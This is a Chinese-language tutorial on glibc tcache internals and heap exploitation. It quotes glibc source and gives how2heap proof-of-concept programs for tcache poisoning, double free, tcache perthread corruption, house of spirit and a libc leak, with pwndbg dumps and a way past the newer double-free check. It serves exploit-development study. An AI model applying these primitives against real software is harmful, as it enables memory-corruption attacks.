Tcache Attack


tcache是glibc-2.26之后引进的一种新机制,类似于fastbin,每条单链表上最多7个chunk,释放时只有当tcache满才将释放的块放入fastbin、unsorted bin;同样的,malloc时也会先在tcache中查找合适的块

概述

tcache中新增了两个结构体,即 tcache_entry 和 tcache_perthread_struct

/* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

/* There is one of these for each thread, which contains the per-thread cache (hence "tcache_perthread_struct").  Keeping overall size low is mildly important.  Note that COUNTS and ENTRIES are redundant (we could have just counted the linked list each time), this is for performance reasons.  */
typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __thread tcache_perthread_struct *tcache = NULL;

关于tcache有两个重要函数,在函数_init_free__libc_malloc的开头被调用:

  • tcache_get(),函数中仅检查tc_idx,类似于fast bin,但是只检查tcache->entries[tc_idx]=e->next;,用处是从tcache中获取chunk
static void *tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}
  • tcache_put(),当请求分配的大小不大于0x408且给定大小的tcache bin未满时调用,用处是将chunk放入tcache
static void tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

一个tcache bin中的最大块数mp_.tcache_count为7

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif

使用

  • 内存释放

在free函数最先处理部分,首先检查释放块是否页对齐及前后的堆块释放情况,然后优先放入tcache结构中

_int_free (mstate av, mchunkptr p, int have_lock)
{
  INTERNAL_SIZE_T size;        /* its size */
  mfastbinptr *fb;             /* associated fastbin */
  mchunkptr nextchunk;         /* next contiguous chunk */
  INTERNAL_SIZE_T nextsize;    /* its size */
  int nextinuse;               /* true if nextchunk is used */
  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
  mchunkptr bck;               /* misc temp for linking */
  mchunkptr fwd;               /* misc temp for linking */

  size = chunksize (p);

  /* Little security check which won't hurt performance: the
     allocator never wrapps around at the end of the address space.
     Therefore we can exclude some size values which might appear
     here by accident or by "design" from some intruder.  */
  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
      || __builtin_expect (misaligned_chunk (p), 0))
    malloc_printerr ("free(): invalid pointer");
  /* We know that each chunk is at least MINSIZE bytes in size or a
     multiple of MALLOC_ALIGNMENT.  */
  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
    malloc_printerr ("free(): invalid size");

  check_inuse_chunk(av, p);

#if USE_TCACHE
  {
    size_t tc_idx = csize2tidx (size);

    if (tcache
      && tc_idx < mp_.tcache_bins
      && tcache->counts[tc_idx] < mp_.tcache_count)
      {
        tcache_put (p, tc_idx);
        return;
      }
  }
#endif
}
  • 内存申请

内存分配时,malloc函数中有多处会将内存块放入tcache中。

  1. 申请的内存块符合fast bin大小并且在fast bin中找到可用的空闲块时,将该fast bin 链上的其他内存块放入tcache中
  2. 申请的内存块符合small bin大小并且在small bin中找到可用的空闲块时,将该small bin链上的其他内存块放入tcache中
  3. unsorted bin链上循环处理时,找到合适大小的链时,不直接返回,会先放到tcache中,继续处理
  • 获得内存:在内存申请的开始部分,首先判断申请大小的块在tcache中是否存在,如果存在就直接从tcache中取出,否则使用_init_malloc分配
  • 循环处理 unsorted bin时,如果达到放入unsorted bin块的最大数量,会立即返回,默认是0,即不存在上限

    #if USE_TCACHE
        /* If we've processed as many chunks as we're allowed while
     filling the cache, return one of the cached ones.  */
        ++tcache_unsorted_count;
        if (return_cached
          && mp_.tcache_unsorted_limit > 0
          && tcache_unsorted_count > mp_.tcache_unsorted_limit)
        {
          return tcache_get (tc_idx);
        }
      #endif
    
  • 在循环处理 unsorted bin内存块之后,如果放入过tcache块,则会取出一个并返回

      #if USE_TCACHE
          /* If all the small chunks we found ended up cached, return one now.  */
          if (return_cached)
          {
              return tcache_get (tc_idx);
          }
      #endif
    

利用

tcache poisoning

通过覆盖tcache中的next,不需要伪造任何chunk结构即可实现malloc到任何地址

how2heap源码:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

int main()
{
    fprintf(stderr, "This file demonstrates a simple tcache poisoning attack by     tricking malloc into\n"
           "returning a pointer to an arbitrary location (in this case, the stack).\n"
           "The attack is very similar to fastbin corruption attack.\n\n");

    size_t stack_var;
    fprintf(stderr, "The address we want malloc() to return is %p.\n", (char *)&    stack_var);

    fprintf(stderr, "Allocating 1 buffer.\n");
    intptr_t *a = malloc(128);
    fprintf(stderr, "malloc(128): %p\n", a);
    fprintf(stderr, "Freeing the buffer...\n");
    free(a);

    fprintf(stderr, "Now the tcache list has [ %p ].\n", a);
    fprintf(stderr, "We overwrite the first %lu bytes (fd/next pointer) of the  data at %p\n"
        "to point to the location to control (%p).\n", sizeof(intptr_t), a, &stack_var);
    a[0] = (intptr_t)&stack_var;

    fprintf(stderr, "1st malloc(128): %p\n", malloc(128));
    fprintf(stderr, "Now the tcache list has [ %p ].\n", &stack_var);

    intptr_t *b = malloc(128);
    fprintf(stderr, "2nd malloc(128): %p\n", b);
    fprintf(stderr, "We got the control\n");

    return 0;
}

释放a后:

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x6022e0 (size : 0x20d20)
       last_remainder: 0x0 (size : 0x0)
            unsortbin: 0x0
(0x90)   tcache_entry[7](1): 0x602260

改写next(fd):

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x6022e0 (size : 0x20d20)
       last_remainder: 0x0 (size : 0x0)
            unsortbin: 0x0
(0x90)   tcache_entry[7](1): 0x602260 --> 0x7fffffffdc80 --> 0x400870 --> 0x41ff894156415741 (invaild memory)
pwndbg> p *(struct tcache_perthread_struct*) 0x602000
$1 = {
  counts = "\000\000\000\000\000\000\000\000Q\002", '\000' <repeats 13 times>, "\001", '\000' <repeats 39 times>,
  entries = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x602260, 0x0 <repeats 54 times>}
}

第八个tcache链的next已经被修改成栈上的地址了,接下来通过两次malloc就得到了栈上的chunk

第一次malloc:

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x6022e0 (size : 0x20d20)
       last_remainder: 0x0 (size : 0x0)
            unsortbin: 0x0
(0x90)   tcache_entry[7](0): 0x7fffffffdc80 --> 0x400870 --> 0x41ff894156415741 (invaild memory)

可以看到我们再一次malloc时就会得到一个栈上的chunk

tcache posioning 这种方法和 fastbin attack 类似,但因为没有 size 的限制有了更大的利用范围

tcache dup

此方法利用的是 tcache_put()函数

static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

tcache_put中没什么检查,所以可以对同一个chunk多次释放

how2heap源码:

#include <stdio.h>
#include <stdlib.h>

int main()
{
  fprintf(stderr, "This file demonstrates a simple double-free attack with tcache.\n");

  fprintf(stderr, "Allocating buffer.\n");
  int *a = malloc(8);

  fprintf(stderr, "malloc(8): %p\n", a);
  fprintf(stderr, "Freeing twice...\n");
  free(a);
  free(a);

  fprintf(stderr, "Now the free list has [ %p, %p ].\n", a, a);
  fprintf(stderr, "Next allocated buffers will be same: [ %p, %p ].\n", malloc(8) , malloc(8));

  return 0;
}

第一次释放:

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x602270 (size : 0x20d90)
       last_remainder: 0x0 (size : 0x0)
            unsortbin: 0x0
(0x20)   tcache_entry[0](1): 0x602260

tcache的第一条链放入了一个chunk

第二次释放时:

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x602270 (size : 0x20d90)
       last_remainder: 0x0 (size : 0x0)
            unsortbin: 0x0
(0x20)   tcache_entry[0](2): 0x602260 --> 0x602260 (overlap chunk with 0x602250(freed) )

因为tcache_put()未做任何检查,所以程序不会崩溃,而且在tcache第一条链中放入了两个相同的chunk

tcache perthread corruption

tcache_pthread_struct是整个tcache的管理结构,如果可以控制这个结构,那么无论malloc的size是多少,都可以得到一个地址可控的chunk

假设有如下堆排布情况:

tcache_    +------------+
\perthread |......      |
\_struct   +------------+
           |counts[i]   |
           +------------+
           |......      |          +----------+
           +------------+          |header    |
           |entries[i]  |--------->+----------+
           +------------+          |NULL      |
           |......      |          +----------+
           |            |          |          |
           +------------+          +----------+

通过如 tcache posioning 等手段之后,将其改成:

tcache_    +------------+<---------------------------+
\perthread |......      |                            |
\_struct   +------------+                            |
           |counts[i]   |                            |
           +------------+                            |
           |......      |          +----------+      |
           +------------+          |header    |      |
           |entries[i]  |--------->+----------+      |
           +------------+          |target    |------+
           |......      |          +----------+
           |            |          |          |
           +------------+          +----------+

就可以通过两次malloc得到 tcache_pthread_struct的地址,进而控制整个tcache

因为tcache_pthread_struct也在堆上,所以一般只需要 partial overwrite就可以达到目的

tcache house of spirit

how2heap源码:

#include <stdio.h>
#include <stdlib.h>

int main()
{
  fprintf(stderr, "This file demonstrates the house of spirit attack on tcache.\n");
  fprintf(stderr, "It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n");
  fprintf(stderr, "You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n");
  fprintf(stderr, "(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n");

  fprintf(stderr, "Ok. Let's start with the example!.\n\n");


  fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
  malloc(1);

  fprintf(stderr, "Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");
  unsigned long long *a; //pointer that will be overwritten
  unsigned long long fake_chunks[10]; //fake chunk region

  fprintf(stderr, "This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]);

  fprintf(stderr, "This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
  fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
  fake_chunks[1] = 0x40; // this is the size


  fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
  fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");

  a = &fake_chunks[2];

  fprintf(stderr, "Freeing the overwritten pointer.\n");
  free(a);

  fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
  fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
}

攻击的目的就是控制栈上的内容,malloc一块chunk,然后通过在栈上的fake chunk 去释放它,这样就会在tcache的一个链里面插入栈上的fake chunks

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x603270 (size : 0x20d90)
       last_remainder: 0x0 (size : 0x0)
            unsortbin: 0x0
(0x40)   tcache_entry[2](1): 0x7fffffffdc50

在 smallbin 中包含有空闲块的时候,会同时将同大小的其他空闲块,放入 tcache 中,此时也会出现解链操作,但相比于 unlink 宏,缺少了链完整性校验。因此,原本 unlink 操作在该条件下也可以使用。

libc leak

在之前的版本中,leak libc:

#include <stdlib.h>
#include <stdio.h>

int main()
{
    long *a = malloc(0x1000);
    malloc(0x10);
    free(a);
    printf("%p\n",a[0]);
}

而在2.26之后,首先需要将tcache填满

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
    long* t[7];
    long *a=malloc(0x100);
    long *b=malloc(0x10);

    // make tcache bin full
    for(int i=0;i<7;i++)
        t[i]=malloc(0x100);
    for(int i=0;i<7;i++)
        free(t[i]);

    free(a);
    // a is put in an unsorted bin because the tcache bin of this size is full
    printf("%p\n",a[0]);
}

free(a)前:

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x602af0 (size : 0x20510)
       last_remainder: 0x0 (size : 0x0)
            unsortbin: 0x0
(0x110)   tcache_entry[15](7): 0x6029f0 --> 0x6028e0 --> 0x6027d0 --> 0x6026c0 --> 0x6025b0 --> 0x6024a0 --> 0x602390

free(a)之后:

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x602af0 (size : 0x20510)
       last_remainder: 0x0 (size : 0x0)
            unsortbin: 0x602250 (size : 0x110)
(0x110)   tcache_entry[15](7): 0x6029f0 --> 0x6028e0 --> 0x6027d0 --> 0x6026c0 --> 0x6025b0 --> 0x6024a0 --> 0x602390
pwndbg> parseheap
addr                prev                size                 status              fd                bk
0x602000            0x0                 0x250                Used                None              None
0x602250            0x0                 0x110                Freed     0x7ffff7dd3c80    0x7ffff7dd3c80 <---main_arena+96
0x602360            0x110               0x20                 Used                None              None

Tcache Check

新版本的libc中添加了对 tcache的double free的check,其中key用于检测double free,让e->key == tcache不成立,就能够绕过检测进行double free(next位于chunk的fd,key则位于bk)

index 6d7a6a8..f730d7a 100644 (file)
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -2967,6 +2967,8 @@ mremap_chunk (mchunkptr p, size_t new_size)
 typedef struct tcache_entry
 {
   struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;
 } tcache_entry;

 /* There is one of these for each thread, which contains the
@@ -2990,6 +2992,11 @@ tcache_put (mchunkptr chunk, size_t tc_idx)
 {
   tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
   assert (tc_idx < TCACHE_MAX_BINS);
+
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+
   e->next = tcache->entries[tc_idx];
   tcache->entries[tc_idx] = e;
   ++(tcache->counts[tc_idx]);
@@ -3005,6 +3012,7 @@ tcache_get (size_t tc_idx)
   assert (tcache->entries[tc_idx] > 0);
   tcache->entries[tc_idx] = e->next;
   --(tcache->counts[tc_idx]);
+  e->key = NULL;
   return (void *) e;
 }

@@ -4218,6 +4226,26 @@ _int_free (mstate av, mchunkptr p, int have_lock)
   {
     size_t tc_idx = csize2tidx (size);

+    /* Check to see if it's already in the tcache.  */
+    tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+    /* This test succeeds on double free.  However, we don't 100%
+       trust it (it also matches random payload data at a 1 in
+       2^<size_t> chance), so verify it's not an unlikely coincidence
+       before aborting.  */
+    if (__glibc_unlikely (e->key == tcache && tcache))
+      {
+       tcache_entry *tmp;
+       LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+       for (tmp = tcache->entries[tc_idx];
+            tmp;
+            tmp = tmp->next)
+         if (tmp == e)
+           malloc_printerr ("free(): double free detected in tcache 2");
+       /* If we get here, it was a coincidence.  We've wasted a few
+          cycles, but don't abort.  */
+      }
+
     if (tcache
        && tc_idx < mp_.tcache_bins
        && tcache->counts[tc_idx] < mp_.tcache_count)